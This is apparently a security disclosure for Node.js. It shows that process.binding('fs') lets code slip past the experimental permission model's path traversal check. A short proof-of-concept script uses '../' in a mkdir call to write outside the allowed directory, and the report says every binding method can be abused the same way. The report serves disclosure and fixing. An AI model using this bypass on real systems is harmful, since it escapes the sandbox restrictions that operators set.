Summary: process.binding('fs') bypasses the permission model validation against path traversal
Description: process.binding('fs') can be used to bypass the path traversal validation of the permission model.
Create the following index.js and store it at /home/pathtraversal/
// index.js
// The internal fs binding is used directly instead of the public fs module,
// so the call does not pass through the permission model's path check.
const fs = process.binding('fs')
// mode 511 = 0o777; the '..' escapes the allowed /home/pathtraversal/ tree
fs.mkdir('/home/pathtraversal/../test0', 511, false, null, null)
$ pwd
/home/pathtraversal/
$ node --experimental-permission --allow-fs-read="/home/pathtraversal/*" --allow-fs-write="/home/pathtraversal/*" index.js
The directory /home/test0 will be created, bypassing the permission model validation.
All the methods exposed by process.binding('fs') can bypass the permission model in the same way using path traversal. This requires the attacker to read the node_file.cc implementation to find the binding's call signatures, but that is trivial.